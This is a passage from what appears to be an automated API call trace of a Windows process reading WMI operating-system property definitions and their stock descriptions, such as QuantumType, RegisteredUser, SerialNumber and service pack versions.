out: pv=0x350027eda0) returned 0x0 [0050.755] SafeArrayGetElement (in: psa=0x233e12eec60, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.755] IUnknown:Release (This=0x233e12e2ee0) returned 0x1 [0050.755] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.755] SysStringLen (param_1="QuantumLength") returned 0xd [0050.755] SysStringLen (param_1="Description") returned 0xb [0050.755] SysStringLen (param_1="QuantumLength") returned 0xd [0050.755] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.755] SysStringLen (param_1="QuantumLength") returned 0xd [0050.756] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14 [0050.756] SysStringLen (param_1="QuantumLength") returned 0xd [0050.756] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.756] SysStringLen (param_1="QuantumLength") returned 0xd [0050.756] SysStringLen (param_1="OSType") returned 0x6 [0050.756] SysStringLen (param_1="QuantumLength") returned 0xd [0050.756] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.756] SysStringLen (param_1="QuantumLength") returned 0xd [0050.756] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.756] SysStringLen (param_1="QuantumLength") returned 0xd [0050.756] SysStringLen (param_1="Primary") returned 0x7 [0050.756] SysStringLen (param_1="Primary") returned 0x7 [0050.756] SysStringLen (param_1="QuantumLength") returned 0xd [0050.756] IUnknown:Release (This=0x233e12dab30) returned 0x1 [0050.756] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.756] IWbemClassObject:Get (in: This=0x233e12db090, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eecd8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.756] IWbemClassObject:Get (in: This=0x233e12db090, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eee58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.756] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.756] IWbemClassObject:Get (in: This=0x233e12db090, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The QuantumType property specifies either fixed or variable length quantums. Windows NT 4.0 Workstation/Windows 2000 defaults to variable length quantums where the foreground application has a longer quantum than the background applications. Windows NT Server defaults to fixed-length quantums. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to another application. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.757] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.757] lstrlenA (lpString="") returned 0 [0050.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.757] SysStringLen (param_1="The QuantumType property specifies either fixed or variable length quantums. Windows NT 4.0 Workstation/Windows 2000 defaults to variable length quantums where the foreground application has a longer quantum than the background applications. Windows NT Server defaults to fixed-length quantums. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to another application. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.") returned 0x2a4 [0050.757] SysStringLen (param_1="") returned 0x0 [0050.757] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.757] IWbemClassObject:Get (in: This=0x233e12db090, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ee9a0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1271030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.757] SafeArrayGetLBound (in: psa=0x233e12ee9a0, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0 [0050.758] SafeArrayGetUBound (in: psa=0x233e12ee9a0, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0 [0050.758] SafeArrayGetElement (in: psa=0x233e12ee9a0, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0 [0050.758] IWbemClassObject:Get (in: This=0x233e12e4460, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.758] IWbemClassObject:Get (in: This=0x233e12e4460, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eeda0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12716d0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.759] SafeArrayGetLBound (in: psa=0x233e12eeda0, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0 [0050.759] SafeArrayGetUBound (in: psa=0x233e12eeda0, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0 [0050.759] lstrlenW (lpString="CIMTYPE") returned 7 [0050.759] lstrlenW (lpString="Values") returned 6 [0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3 [0050.759] lstrlenW (lpString="read") returned 4 [0050.759] lstrlenW (lpString="Values") returned 6 [0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3 [0050.759] lstrlenW (lpString="write") returned 5 [0050.759] lstrlenW (lpString="Values") returned 6 [0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1 [0050.759] lstrlenW (lpString="In") returned 2 [0050.759] lstrlenW (lpString="Values") returned 6 [0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3 [0050.759] lstrlenW (lpString="Out") returned 3 [0050.759] lstrlenW (lpString="Values") returned 6 [0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3 [0050.759] SafeArrayGetElement (in: psa=0x233e12eeda0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.759] SafeArrayGetElement (in: psa=0x233e12eeda0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.759] SafeArrayGetElement (in: psa=0x233e12eeda0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0 [0050.759] IUnknown:Release (This=0x233e12e4460) returned 0x1 [0050.760] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] SysStringLen (param_1="Description") returned 0xb [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] SysStringLen (param_1="OSType") returned 0x6 [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] SysStringLen (param_1="Primary") returned 0x7 [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] SysStringLen (param_1="QuantumLength") returned 0xd [0050.760] SysStringLen (param_1="QuantumLength") returned 0xd [0050.760] SysStringLen (param_1="QuantumType") returned 0xb [0050.760] IUnknown:Release (This=0x233e12db090) returned 0x1 [0050.760] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.760] IWbemClassObject:Get (in: This=0x233e12dc360, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12f0938, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.760] IWbemClassObject:Get (in: This=0x233e12dc360, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12f0c98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.761] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.761] IWbemClassObject:Get (in: This=0x233e12dc360, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The RegisteredUser property indicates the name of the registered user of the operating system./nExample: Jane Doe", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.761] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.761] lstrlenA (lpString="") returned 0 [0050.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc180, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.761] SysStringLen (param_1="The RegisteredUser property indicates the name of the registered user of the operating system./nExample: Jane Doe") returned 0x71 [0050.761] SysStringLen (param_1="") returned 0x0 [0050.761] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.761] IWbemClassObject:Get (in: This=0x233e12dc360, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.761] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] SysStringLen (param_1="Description") returned 0xb [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] SysStringLen (param_1="OSType") returned 0x6 [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] SysStringLen (param_1="OtherTypeDescription") returned 0x14 [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] SysStringLen (param_1="QuantumLength") returned 0xd [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] SysStringLen (param_1="QuantumType") returned 0xb [0050.762] SysStringLen (param_1="QuantumType") returned 0xb [0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.762] IUnknown:Release (This=0x233e12dc360) returned 0x1 [0050.762] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.762] IWbemClassObject:Get (in: This=0x233e12dc610, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eee58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.762] IWbemClassObject:Get (in: This=0x233e12dc610, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eef98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.762] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.763] IWbemClassObject:Get (in: This=0x233e12dc610, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The SerialNumber property indicatesthe operating system product serial identification number./nExample:10497-OEM-0031416-71674.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.763] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.763] lstrlenA (lpString="") returned 0 [0050.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc160, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.763] SysStringLen (param_1="The SerialNumber property indicatesthe operating system product serial identification number./nExample:10497-OEM-0031416-71674.") returned 0x7f [0050.763] SysStringLen (param_1="") returned 0x0 [0050.763] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.763] IWbemClassObject:Get (in: This=0x233e12dc610, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.763] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.763] SysStringLen (param_1="SerialNumber") returned 0xc [0050.763] SysStringLen (param_1="Description") returned 0xb [0050.763] SysStringLen (param_1="SerialNumber") returned 0xc [0050.764] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.764] SysStringLen (param_1="SerialNumber") returned 0xc [0050.764] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.764] SysStringLen (param_1="SerialNumber") returned 0xc [0050.764] SysStringLen (param_1="OSType") returned 0x6 [0050.764] SysStringLen (param_1="SerialNumber") returned 0xc [0050.764] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.764] SysStringLen (param_1="SerialNumber") returned 0xc [0050.764] SysStringLen (param_1="QuantumLength") returned 0xd [0050.764] SysStringLen (param_1="SerialNumber") returned 0xc [0050.764] SysStringLen (param_1="QuantumType") returned 0xb [0050.764] SysStringLen (param_1="SerialNumber") returned 0xc [0050.764] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.764] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.764] SysStringLen (param_1="SerialNumber") returned 0xc [0050.764] IUnknown:Release (This=0x233e12dc610) returned 0x1 [0050.764] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.764] IWbemClassObject:Get (in: This=0x233e12d9050, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eef98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.764] IWbemClassObject:Get (in: This=0x233e12d9050, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eea18, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.764] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.764] IWbemClassObject:Get (in: This=0x233e12d9050, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ServicePackMajorVersion property indicates the major version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMajorVersion is valid for computers running Windows 2000 and later (NULL otherwise).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.765] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.765] lstrlenA (lpString="") returned 0 [0050.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.765] SysStringLen (param_1="The ServicePackMajorVersion property indicates the major version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMajorVersion is valid for computers running Windows 2000 and later (NULL otherwise).") returned 0x117 [0050.765] SysStringLen (param_1="") returned 0x0 [0050.765] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.765] IWbemClassObject:Get (in: This=0x233e12d9050, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.765] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.765] SysStringLen (param_1="Description") returned 0xb [0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.765] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.765] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.765] SysStringLen (param_1="OSType") returned 0x6 [0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.766] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.766] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.766] SysStringLen (param_1="QuantumLength") returned 0xd [0050.766] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.766] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.766] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.766] SysStringLen (param_1="SerialNumber") returned 0xc [0050.766] SysStringLen (param_1="SerialNumber") returned 0xc [0050.766] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.766] IUnknown:Release (This=0x233e12d9050) returned 0x1 [0050.766] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.766] IWbemClassObject:Get (in: This=0x233e12d9300, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eb868, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.766] IWbemClassObject:Get (in: This=0x233e12d9300, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebe58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.766] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.766] IWbemClassObject:Get (in: This=0x233e12d9300, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ServicePackMinorVersion property indicates the minor version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMinorVersion is valid for computers running Windows 2000 and later (NULL otherwise).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.767] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.767] lstrlenA (lpString="") returned 0 [0050.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc150, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.767] SysStringLen (param_1="The ServicePackMinorVersion property indicates the minor version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMinorVersion is valid for computers running Windows 2000 and later (NULL otherwise).") returned 0x117 [0050.767] SysStringLen (param_1="") returned 0x0 [0050.767] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.767] IWbemClassObject:Get (in: This=0x233e12d9300, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.767] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.767] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.767] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.767] SysStringLen (param_1="OSType") returned 0x6 [0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.767] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.768] SysStringLen (param_1="QuantumLength") returned 0xd [0050.768] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.768] SysStringLen (param_1="RegisteredUser") returned 0xe [0050.768] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.768] SysStringLen (param_1="SerialNumber") returned 0xc [0050.768] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.768] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.768] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17 [0050.768] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17 [0050.768] IUnknown:Release (This=0x233e12d9300) returned 0x1 [0050.768] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0 [0050.768] IWbemClassObject:Get (in: This=0x233e12da320, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebe58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.768] IWbemClassObject:Get (in: This=0x233e12da320, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebf48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.769] ??0CHString@@QEAA@XZ () returned 0x350027ef68 [0050.769] IWbemClassObject:Get (in: This=0x233e12da320, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The total number of kilobytes that can be stored in the operating system's paging files. Note that this number does not represent the actual physical size of the paging file on disk. 0 indicates that there are no paging files.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.769] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.769] lstrlenA (lpString="") returned 0 [0050.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0050.769] SysStringLen (param_1="The total number of kilobytes that can be stored in the operating system's paging files. Note that this number does not represent the actual physical size of the paging file on disk. 0 indicates that there are no paging files.") returned 0xe3 [0050.769] SysStringLen (param_1="") returned 0x0 [0050.769] ??0CHString@@QEAA@XZ () returned 0x350027ed78 [0050.769] IWbemClassObject:Get (in: This=0x233e12da320, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0050.769] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] SysStringLen (param_1="LastBootUpTime") returned 0xe [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] SysStringLen (param_1="NumberOfProcesses") returned 0x11 [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] SysStringLen (param_1="OSType") returned 0x6 [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] SysStringLen (param_1="PlusVersionNumber") returned 0x11 [0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17 [0050.770] SysStringLen 